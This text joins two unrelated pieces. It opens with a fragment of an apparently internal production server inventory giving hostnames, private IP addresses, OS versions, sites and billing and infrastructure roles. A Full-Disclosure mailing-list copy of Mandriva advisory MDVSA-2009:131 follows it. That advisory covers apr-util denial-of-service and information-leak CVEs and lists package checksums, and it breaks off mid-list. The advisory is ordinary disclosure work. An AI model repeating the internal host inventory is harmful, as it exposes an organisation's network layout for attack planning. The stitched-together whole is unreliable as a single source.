11.23 NEXUS #N/A #N/A 1 proter11 Prod #N/A #N/A #N/A #N/A 10.130.225.58 HP-UX 11.23 NEXUS #N/A #N/A 1 proter12 Prod #N/A #N/A #N/A #N/A 10.130.225.59 HP-UX 11.23 NEXUS #N/A #N/A 1 proter13 Prod #N/A #N/A #N/A #N/A 10.130.225.60 HP-UX 11.23 NEXUS #N/A #N/A 1 proter14 Prod #N/A #N/A #N/A #N/A 10.130.225.16 HP-UX 11.23 NEXUS #N/A #N/A 1 proter15 Prod #N/A #N/A #N/A #N/A 10.130.225.17 HP-UX 11.23 NEXUS #N/A #N/A 1 proter16 Prod #N/A #N/A #N/A #N/A 10.130.225.18 HP-UX 11.23 NEXUS #N/A #N/A 1 protes02 Prod Infra Tidal 583 Tidal 10.65.16.62 HP-UX 11.00 TAMPA #N/A #N/A 1 protil01 Prod Infra Tidal 583 Tidal 10.1.16.22 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 protil02 Prod Infra Tidal 583 Tidal 10.1.16.40 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 protlf01 Prod Infra TeaLeaf 571 TeaLeaf 10.1.24.94 Linux 4ES BOTHELL_7 #N/A #N/A 1 protlf02 Prod Infra TeaLeaf 571 TeaLeaf 10.1.24.92 Linux 4ES BOTHELL_7 #N/A #N/A 1 protnt01 Prod IHAP TN Tracker 602 TNTracker 10.133.81.93 SunOS 5.10 TAMPA #N/A #N/A 1 protnt02 Prod IHAP TN Tracker 602 TNTracker 10.65.21.165 SunOS 5.10 TAMPA #N/A #N/A 1 protrx01 Prod Infra File transfer 206 File transfer 10.1.16.121 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 protrx02 Prod Infra File transfer 206 File transfer 10.1.16.122 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg01 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.72 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg02 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.226 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg03 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.80 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg04 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.75 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg05 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.89 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg06 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.92 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg07 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.93 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg08 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.180 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg09 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.211 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg10 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.227 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg11 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.228 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg12 Prod Billing Samson - Usage 691 Samson Usage 10.1.16.229 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prousg13 Prod Billing Samson - Usage 691 Samson Usage 10.133.113.152 HP-UX 11.23 NEXUS #N/A #N/A 1 prousg14 Prod Billing Samson - Usage 691 Samson Usage 10.133.113.154 HP-UX 11.23 NEXUS #N/A #N/A 1 prousg31 Prod Billing Samson - Usage 691 Samson Usage 10.133.81.69 HP-UX 11.23 NEXUS #N/A #N/A 1 prousg32 Prod Billing Samson - Usage 691 Samson Usage 10.133.81.70 HP-UX 11.23 NEXUS #N/A #N/A 1 prousg33 Prod Billing Samson - Usage 691 Samson Usage 10.133.81.122 HP-UX 11.23 NEXUS #N/A #N/A 1 prouws01 Prod Infra Infrastructure 253 Infrastructure 10.1.16.236 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prowdc01 Prod Infra DataComm - Syslog 674 DataComm - Syslog 10.133.17.29 SunOS 5.9 NEXUS #N/A #N/A 1 prowfm01 Prod IHAP work force mgt 669 work force mgt 10.1.16.55 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proxfr03 Prod Infra Connect Direct 106 Connect Direct 10.133.33.130 HP-UX 11.11 NEXUS #N/A #N/A 1 proxfr04 Prod Infra Connect Direct 106 Connect Direct 10.133.65.37 HP-UX 11.23 NEXUS #N/A #N/A 1 From security at mandriva.com Sat Jun 6 23:27:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Sun, 07 Jun 2009 00:27:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:131 ] apr-util Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:131 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apr-util Date : June 6, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in apr-util: The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, related to an underflow flaw. (CVE-2009-0023). The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564 (CVE-2009-1955). Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input (CVE-2009-1956). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0023 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1956 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 92f1f45dfb84661bd03bf51bee6897d9 2008.1/i586/apr-util-dbd-mysql-1.2.12-4.1mdv2008.1.i586.rpm caef9a32c67002abedab6b0ac17b1967 2008.1/i586/apr-util-dbd-pgsql-1.2.12-4.1mdv2008.1.i586.rpm 8801ecf1cdfdc5dfa78c30bdad3cd060 2008.1/i586/apr-util-dbd-sqlite3-1.2.12-4.1mdv2008.1.i586.rpm 9d66380821421ad635227dc5476318b0 2008.1/i586/libapr-util1-1.2.12-4.1mdv2008.1.i586.rpm 1e5ddcfcc0ad295b60973b5d52d011b3 2008.1/i586/libapr-util-devel-1.2.12-4.1mdv2008.1.i586.rpm e08259c07ac94bc85845f3734be8db34 2008.1/SRPMS/apr-util-1.2.12-4.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: d56edd77f88f36b09f83b713c9d8ffa2 2008.1/x86_64/apr-util-dbd-mysql-1.2.12-4.1mdv2008.1.x86_64.rpm 0d92993cb208bb096a8ea368f54fe11f 2008.1/x86_64/apr-util-dbd-pgsql-1.2.12-4.1mdv2008.1.x86_64.rpm 1dc136b490ff75420d7c574ef8c3171b 2008.1/x86_64/apr-util-dbd-sqlite3-1.2.12-4.1mdv2008.1.x86_64.rpm f45811447bb16f318e801358dd204ed3 2008.1/x86_64/lib64apr-util1-1.2.12-4.1mdv2008.1.x86_64.rpm dc610ef400bafbcb7661a211c14b5391 2008.1/x86_64/lib64apr-util-devel-1.2.12-4.1mdv2008.1.x86_64.rpm e08259c07ac94bc85845f3734be8db34 2008.1/SRPMS/apr-util-1.2.12-4.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 9176400dae2afb4b5b3610d2f210cc59 2009.0/i586/apr-util-dbd-freetds-1.3.4-2.1mdv2009.0.i586.rpm a7bf775d9602e8334e1cd741b3629968 2009.0/i586/apr-util-dbd-ldap-1.3.4-2.1mdv2009.0.i586.rpm 3c7258acac4168f81a0c885e30bf1aba 2009.0/i586/apr-util-dbd-mysql-1.3.4-2.1mdv2009.0.i586.rpm 7addb0ca1d17c3c13d82546ba37fe88a 2009.0/i586/apr-util-dbd-odbc-1.3.4-2.1mdv2009.0.i586.rpm 557370eb6a25ce86b8c2b7fa09d7c272 2009.0/i586/apr-util-dbd-pgsql-1.3.4-2.1mdv2009.0.i586.rpm 32ede22cfdb2ea0e4d493a0a266f8080 2009.0/i586/apr-util-dbd-sqlite3-1.3.4-2.1mdv2009.0.i586.rpm 7caa67204bbfedd4d02957e5b01d536b 2009.0/i586/libapr-util1-1.3.4-2.1mdv2009.0.i586.rpm 73b73db72a446ef172144f87e42efab5 2009.0/i586/libapr-util-devel-1.3.4-2.1mdv2009.0.i586.rpm b26a710b3ab76a3455c379b7fb445dcd 2009.0/SRPMS/apr-util-1.3.4-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 1518e4d5cc1ed90ede935be0526f45c7 2009.0/x86_64/apr-util-dbd-freetds-1.3.4-2.1mdv2009.0.x86_64.rpm 438292564ad5f4816b611b30d5801133 2009.0/x86_64/apr-util-dbd-ldap-1.3.4-2.1mdv2009.0.x86_64.rpm 1b9f81750a5e10163d8e1ef66824a9fd 2009.0/x86_64/apr-util-dbd-mysql-1.3.4-2.1mdv2009.0.x86_64.rpm 5c66b915d362e2f76af8826cda7ad4f1 2009.0/x86_64/apr-util-dbd-odbc-1.3.4-2.1mdv2009.0.x86_64.rpm b2a87f1ad69286bb6a85cc5684e0a923 2009.0/x86_64/apr-util-dbd-pgsql-1.3.4-2.1mdv2009.0.x86_64.rpm a83f43dbc1e469d35790aa1a416bc532 2009.0/x86_64/apr-util-dbd-sqlite3-1.3.4-2.1mdv2009.0.x86_64.rpm 07799e945a1f9d8a87c1d3571b294566 2009.0/x86_64/lib64apr-util1-1.3.4-2.1mdv2009.0.x86_64.rpm 00a029d2d94c2c148b42a577fb050230 2009.0/x86_64/lib64apr-util-devel-1.3.4-2.1mdv2009.0.x86_64.rpm b26a710b3ab76a3455c379b7fb445dcd 2009.0/SRPMS/apr-util-1.3.4-2.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 5dddb4e8f882abeafe169068155b39e5 2009.1/i586/apr-util-dbd-freetds-1.3.4-9.1mdv2009.1.i586.rpm ec7826f62f8532cc9d9f0ec4493c27a8 2009.1/i586/apr-util-dbd-ldap-1.3.4-9.1mdv2009.1.i586.rpm a2d652ea15ad9d6fdb20c0c4597b5e92 2009.1/i586/apr-util-dbd-mysql-1.3.4-9.1mdv2009.1.i586.rpm 04edc5f79d1f1fb944f124be02f5f4f4 2009.1/i586/apr-util-dbd-odbc-1.3.4-9.1mdv2009.1.i586.rpm 5d442d45fd174ede671616de3633c3d1 2009.1/i586/apr-util-dbd-pgsql-1.3.4-9.1mdv2009.1.i586.rpm d8c39ce871315657d14cd667b86b0a1f 2009.1/i586/apr-util-dbd-sqlite3-1.3.4-9.1mdv2009.1.i586.rpm 53ff86d912ddd8f03f2cc7008e6b3efe 2009.1/i586/libapr-util1-1.3.4-9.1mdv2009.1.i586.rpm 4e48b8ec5cfd96049995be6b35620777 2009.1/i586/libapr-util-devel-1.3.4-9.1mdv2009.1.i586.rpm 5f540f08104dd6b9308fb8a250265934 2009.1/SRPMS/apr-util-1.3.4-9.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 2a2b2b3ad850b47a0e46e3887b2444bb 2009.1/x86_64/apr-util-dbd-freetds-1.3.4-9.1mdv2009.1.x86_64.rpm 20da927348792593bc861c87c179731c 2009.1/x86_64/apr-util-dbd-ldap-1.3.4-9.1mdv200